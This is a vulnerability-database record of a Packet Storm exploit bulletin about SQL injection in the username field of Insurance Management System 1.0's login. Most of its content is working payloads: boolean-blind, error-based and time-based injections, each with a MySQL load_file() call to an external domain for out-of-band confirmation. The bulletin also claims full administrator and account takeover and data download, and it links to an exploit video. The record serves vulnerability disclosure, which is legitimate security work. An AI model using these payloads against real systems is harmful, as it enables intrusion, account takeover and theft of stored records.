{"id": "PACKETSTORM:166286", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Insurance Management System 1.0 SQL Injection", "description": "", "published": "2022-03-14T00:00:00", "modified": "2022-03-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166286/Insurance-Management-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-03-14T19:11:44", "viewCount": 73, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "vulnersScore": -0.2}, "_state": {"dependencies": 1647589125}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166286/insurancemgmtsys10-sql.txt", "sourceData": "`## Title: Insurance Management System v1.0 SQLi \n## Author: nu11secur1ty \n## Date: 03.12.2022 \n## Vendor: https://itsourcecode.com/free-projects/php-project/php-projects-source-code-free-downloads/ \n## Software: https://itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/ \n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/itsourcecode.com/Insurance-Management-System \n \n## Description: \nThe username parameter appears to be vulnerable to SQL injection \nattacks. The payload '+(select \nload_file('\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\\\xek'))+' \nwas submitted in the username parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nThe attacker can take administrator account control and also of all \naccounts on this system, also the malicious user can download all \ninformation about this system. \n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: username (POST) \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) \nPayload: username=GvWNfNIz'+(select \nload_file('\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\\\xek'))+'' \nAND 7122=(SELECT (CASE WHEN (7122=7122) THEN 7122 ELSE (SELECT 6385 \nUNION SELECT 2068) END))-- -&password=y6E!b3n!T9 \n \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: username=GvWNfNIz'+(select \nload_file('\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\\\xek'))+'' \nAND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT \n(ELT(3405=3405,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zJzm&password=y6E!b3n!T9 \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: username=GvWNfNIz'+(select \nload_file('\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\\\xek'))+'' \nAND (SELECT 5739 FROM (SELECT(SLEEP(5)))crqV)-- \npBFE&password=y6E!b3n!T9 \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/itsourcecode.com/Insurance-Management-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/iyml42) \n \n \n`\n"}
{}